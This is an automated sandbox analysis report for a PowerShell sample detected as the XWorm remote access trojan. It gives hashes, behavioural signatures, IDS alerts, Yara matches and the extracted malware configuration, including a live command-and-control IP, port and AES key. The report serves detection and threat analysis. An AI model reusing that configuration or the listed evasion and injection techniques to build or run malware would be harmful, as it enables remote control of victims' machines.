Windows Analysis Report
Wn0FGQ53RW.ps1

Overview

General Information

Sample name: Wn0FGQ53RW.ps1
renamed because original name is a hash value
Original sample name: 96fcb55e93b282b6650cb439cd1a78bc0c723072826fd8f2e584d43d6fbac0c1.ps1
Analysis ID: 1599246
MD5: 2c54adfb1177ddcfbe5d7b775d69ac5d
SHA1: f9237539d22ca1c2a82d6bd2c4ee8f4e9b3aa14b
SHA256: 96fcb55e93b282b6650cb439cd1a78bc0c723072826fd8f2e584d43d6fbac0c1
Tags: 176-113-115-228bookingps1user-JAMESWT_MHT

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Monitors registry run keys for changes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Explorer Process Tree Break
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

[Classification chart: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious]

AV Detection

Source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["176.113.115.228"], "Port": 4412, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: Wn0FGQ53RW.ps1 Virustotal: Detection: 9%
Source: Wn0FGQ53RW.ps1 ReversingLabs: Detection: 13%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp String decryptor: 176.113.115.228
Source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp String decryptor: 4412
Source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp String decryptor: P0WER
Source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp String decryptor: <Xwormmm>
Source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp String decryptor: XWorm
Source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp String decryptor: USB.exe
Source: Binary string: C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\DLL\DLL\obj\Debug\DLL.pdb source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2269118993.00000000068D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2250081540.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000006.00000002.2159298688.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\DLL\DLL\obj\Debug\DLL.pdb" source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2269118993.00000000068D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2250081540.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000006.00000002.2159298688.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 4x nop then jmp 011BE504h 6_2_011BE090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 4x nop then jmp 011BE516h 6_2_011BE090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 4x nop then mov ecx, dword ptr [ebp-4Ch] 6_2_011B53BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 6_2_011B83B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 4x nop then mov ecx, dword ptr [ebp-4Ch] 6_2_011B445C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 6_2_011B5B68

Networking

Source: Network traffic Suricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49731 -> 176.113.115.228:4412
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49738 -> 176.113.115.228:4412
Source: Network traffic Suricata IDS: 2858798 - Severity 1 - ETPRO MALWARE Win32/XWorm V2 CnC Command - PING Outbound : 192.168.2.4:49738 -> 176.113.115.228:4412
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 176.113.115.228:4412 -> 192.168.2.4:49731
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49731 -> 176.113.115.228:4412
Source: Network traffic Suricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 176.113.115.228:4412 -> 192.168.2.4:49731
Source: Network traffic Suricata IDS: 2858805 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.4:49731 -> 176.113.115.228:4412
Source: Network traffic Suricata IDS: 2858806 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 176.113.115.228:4412 -> 192.168.2.4:49731
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 176.113.115.228:4412 -> 192.168.2.4:49738
Source: Malware configuration extractor URLs: 176.113.115.228
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 176.113.115.228:4412
Source: Joe Sandbox View ASN Name: SELECTELRU
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: svchost.exe, 00000009.00000002.2951230208.0000028AFEE0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000009.00000003.2040570757.0000028AFF018000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.9.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.9.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.9.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000009.00000003.2040570757.0000028AFF018000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000009.00000003.2040570757.0000028AFF018000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000009.00000003.2040570757.0000028AFF04D000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.9.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000000.00000002.1736362189.000001EE6F2BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1715523883.000001EE60336000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1715523883.000001EE5F278000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1744127452.000001EE771D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1715523883.000001EE5F051000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2250081540.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000006.00000002.2160888258.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2048538649.0000000005211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1715523883.000001EE5F278000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1744127452.000001EE771D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000000B.00000002.2948824376.00000000063AF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2067340503.00000000063AF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2070457843.00000000063AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 0000000B.00000002.2948824376.00000000063AF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2067340503.00000000063AF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2070457843.00000000063AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirmi
Source: powershell.exe, 00000000.00000002.1715523883.000001EE5F051000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2048538649.0000000005227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2048538649.0000000005211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000000.00000002.1715523883.000001EE60336000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1715523883.000001EE60336000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1715523883.000001EE60336000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000009.00000003.2040570757.0000028AFF0C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.9.dr, qmgr.db.9.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.9.dr, qmgr.db.9.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.9.dr, qmgr.db.9.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000009.00000003.2040570757.0000028AFF0C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000000.00000002.1715523883.000001EE5F278000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1744127452.000001EE771D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1715523883.000001EE5F4E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1736362189.000001EE6F2BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1715523883.000001EE60336000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000009.00000003.2040570757.0000028AFF0C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.9.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 6_2_011B8620 CreateDesktopA, 6_2_011B8620

System Summary

Source: 0.2.powershell.exe.1ee5f4509a0.2.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.powershell.exe.1ee5f4509a0.2.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.powershell.exe.1ee60275c50.0.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.powershell.exe.1ee60275c50.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000002.2246251774.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1715523883.000001EE5F4AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1715523883.000001EE5F278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B96103D 0_2_00007FFD9B96103D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_00F6C2D8 2_2_00F6C2D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_00F66340 2_2_00F66340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_00F684B8 2_2_00F684B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_00F6B598 2_2_00F6B598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_00F65A70 2_2_00F65A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_00F65728 2_2_00F65728
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_00F60FA0 2_2_00F60FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638EF38 2_2_0638EF38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06382C48 2_2_06382C48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638BCB0 2_2_0638BCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638DD70 2_2_0638DD70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06388A68 2_2_06388A68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06387BC0 2_2_06387BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638E078 2_2_0638E078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06386928 2_2_06386928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063871C8 2_2_063871C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638C670 2_2_0638C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06387658 2_2_06387658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06387648 2_2_06387648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638C680 2_2_0638C680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638A6F0 2_2_0638A6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638A700 2_2_0638A700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06385CA8 2_2_06385CA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06385CA3 2_2_06385CA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638BC8F 2_2_0638BC8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638ACD8 2_2_0638ACD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638ACC8 2_2_0638ACC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638CD28 2_2_0638CD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638DD61 2_2_0638DD61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638AAA0 2_2_0638AAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638AA90 2_2_0638AA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06387BB3 2_2_06387BB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638E068 2_2_0638E068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06380040 2_2_06380040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06386889 2_2_06386889
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063898E8 2_2_063898E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063898D8 2_2_063898D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638B130 2_2_0638B130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638B121 2_2_0638B121
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06386923 2_2_06386923
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06388915 2_2_06388915
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063871B8 2_2_063871B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063889EF 2_2_063889EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0C725677 2_2_0C725677
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0C725688 2_2_0C725688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0C720007 2_2_0C720007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0C721230 2_2_0C721230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0C721220 2_2_0C721220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0C721230 2_2_0C721230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 6_2_011BD830 6_2_011BD830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 6_2_011BCA00 6_2_011BCA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 6_2_011B8018 6_2_011B8018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 6_2_011BC4B0 6_2_011BC4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 6_2_011B8828 6_2_011B8828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 6_2_011B88B0 6_2_011B88B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 6_2_011B4A30 6_2_011B4A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 6_2_011B4A20 6_2_011B4A20
Source: 0.2.powershell.exe.1ee5f4509a0.2.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.powershell.exe.1ee5f4509a0.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.powershell.exe.1ee60275c50.0.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.powershell.exe.1ee60275c50.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000002.2246251774.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1715523883.000001EE5F4AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1715523883.000001EE5F278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, eTjxx5sBsv0TQY2QsBukke7xGuRK5Vrnm4Vc7A6o9H3gWnlfVttPzqM2XIgnZsx9KoT8nFv5wwqNH0KJaX9HbOIURT9H.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, eTjxx5sBsv0TQY2QsBukke7xGuRK5Vrnm4Vc7A6o9H3gWnlfVttPzqM2XIgnZsx9KoT8nFv5wwqNH0KJaX9HbOIURT9H.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.RegSvcs.exe.68d03d8.4.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.RegSvcs.exe.68d03d8.4.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.RegSvcs.exe.2c02294.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.RegSvcs.exe.2c02294.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
